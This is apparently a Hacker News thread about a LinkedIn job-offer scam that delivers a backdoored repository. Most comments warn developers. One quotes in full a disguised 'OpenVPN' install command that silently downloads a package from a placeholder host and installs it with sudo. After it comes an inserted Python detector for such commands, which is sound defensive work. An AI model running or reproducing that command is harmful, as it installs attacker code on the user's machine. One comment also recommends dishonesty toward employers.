
A backdoor in a LinkedIn job offer

1532 points by lwhsiao yesterday at 8:00 PM | 292 comments

Comments

harrouet today at 9:57 AM

How about running that backdoor from a honeypot and checking what it is trying to do?

mujib77 today at 4:40 AM

This is the first time I have heard of this type of scam, so horrible, like people need to be careful on both GitHub and LinkedIn

mattcasmith yesterday at 8:49 PM

I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.

The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.

game_the0ry today at 2:50 PM

> Instead of cloning and installing dependencies, I spun up a throwaway VPS on Hetzner, cloned the repo there, and pointed Pi at it in read-only mode, with only file-reading tools enabled...

Good man, knows what he is doing.

FWIW, I only run ai cli tools on a hostinger vps, never on my personal device. Also allows me to run YOLO mode across the board. If I am working on a web project, then I use preview develop deploys for testing, so I do not even have to work on my machine. It's a very fun workflow for experimentation. Still trying to work out the kinks to make it easier.

> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.

Come on, github...

qq66 today at 5:19 AM

Western governments should treat large-scale scammers and the countries that protect them as an act of war.

lamtanphan today at 11:33 AM

I reported it and it seems like the repo no longer exists

h4kunamata yesterday at 11:28 PM

Honestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."

robotnikman yesterday at 8:34 PM

With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.

Stay vigilant out there everyone.

khernandezrt yesterday at 9:39 PM

It would have been game over for me.

binsquare yesterday at 9:39 PM

Would highly recommend running any repo in an isolated environment like a vm

gyoridavid today at 1:40 AM

I wonder if an antivirus software would catch this..

Kuyawa today at 1:58 PM

I've got more than a handful of these offers so I decided to never install anything and politely decline such offers.

Linkedin has become a rotten cesspool of scammers and spammers, ripe for disruption.

harrouet today at 9:50 AM

Damned, there is a market for an "antivirus for developers".

dyingkneepad yesterday at 8:44 PM

Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?

croes today at 5:54 AM

So the backdoor isn’t in the offer but came per offer

zombot today at 5:10 AM

> so just installing dependencies executes the backdoor.

How anybody in their right mind still uses this tech stack is beyond me.

> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.

Remember to treat every site on the internet as an adversary, even if they weren't in the past.

psychoslave today at 5:00 AM

I'm a simple man. I see crypto currency and I move away from what looks like a social scam.

Sure, that might have been the one chance in a lifetime to easy big money. Or just a path to financial big troubles.

avgDev yesterday at 8:56 PM

More reasons for me to dislike linked-in. I have an account. I hate it.

stainablesteel yesterday at 10:00 PM

the entire internet is just phishing at this point

contingencies yesterday at 8:44 PM

Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.

dolebirchwood yesterday at 9:11 PM

As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).

They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents were as follows (with the malicious URL removed):

```
( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]
```

Yeah, no. Be careful out there.

By the way, here's the scammer's "company website": https://jtwllc.com/

Superficially looks legit until you start investigating the finer details.
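An added example (not code from this thread or from anyone in it): a small Python paste-inspector that flags the techniques visible in the one-liner above (silenced background subshell, remote download to disk, `sudo installer`, process killing, self-cleanup) and reports how much of the clipboard the page's displayed snippet hid. The sample commands and the placeholder URL are constructed for the example.

```python
import re

# (label, pattern): one rule per technique visible in the quoted one-liner
RULES = [
    ("backgrounded subshell with output silenced",
     re.compile(r"\)\s*>\s*/dev/null\s+2>&1\s*&")),
    ("remote download written to disk",
     re.compile(r"\bcurl\b[^;|&]*\s(--output|-o)\s")),
    ("package installed with sudo",
     re.compile(r"\bsudo\s+installer\s+-pkg\b")),
    ("process kill loop", re.compile(r"\bpkill\b")),
    ("Rosetta install requested", re.compile(r"softwareupdate\s+--install-rosetta")),
    ("removes its own artifacts", re.compile(r"\brm\s+-f\b")),
]

def scan_command(cmd):
    """Return the label of every rule that matches the pasted command."""
    return [label for label, rx in RULES if rx.search(cmd)]

def hidden_tail(visible, clipboard):
    """Return what the clipboard carries beyond the text the page displayed.

    Empty string means the page showed the whole command; if the clipboard
    does not even start with the shown text, the whole clipboard is returned.
    """
    visible, clipboard = visible.strip(), clipboard.strip()
    if clipboard.startswith(visible):
        return clipboard[len(visible):].strip()
    return clipboard

def verdict(visible, clipboard):
    """Combine both checks; run_it is True only if nothing was hidden and no rule fired."""
    hits = scan_command(clipboard)
    tail = hidden_tail(visible, clipboard)
    return {"hidden_length": len(tail), "hits": hits, "run_it": not tail and not hits}

# Constructed samples (placeholder URL): what the page showed, and two clipboards
SHOWN = "( brew install openvpn )"
HONEST = "( brew install openvpn )"
SCAM = ('( brew install openvpn ) >/dev/null 2>&1 & '
        '( url="https://example.invalid/pkg"; f="/Users/Shared/pkg"; '
        'curl --silent --fail --location --url "$url" --output "$f" '
        '&& sudo installer -pkg "$f" -target /; rm -f "$f" ) >/dev/null 2>&1 &')

if __name__ == "__main__":
    for name, clip in (("honest", HONEST), ("scam", SCAM)):
        print(name, verdict(SHOWN, clip))
```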

zuzululu yesterday at 9:38 PM

I'm working 3 remote jobs right now and I can tell you guys to really watch out.

Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers' heads that "leetcode is outdated/they don't believe in it" and whatever they want you to hear.

They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.

I am much wiser now that I work multiple salary jobs remotely, and I realize these 3 golden rules:

- Don't stay loyal to your employers.

- Don't stay honest to those who don't value it.

- Don't stay complacent; always innovate.

blindriver today at 12:56 AM

LinkedIn is a cesspool of scams now.

They know there's a high degree of fraud and they don't do anything about it. They don't care.

I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.

bitfilped today at 3:44 AM

Once again I'll state my opinion, don't use linkedin. It's a social media site not an employment/recruitment resource.

l0new0lf-G yesterday at 9:03 PM

Yet another reason to be reluctant to even discuss linkedin job offers

yieldcrv yesterday at 8:52 PM

now imagine if you were like the rest of us and didn’t write a blog post about it
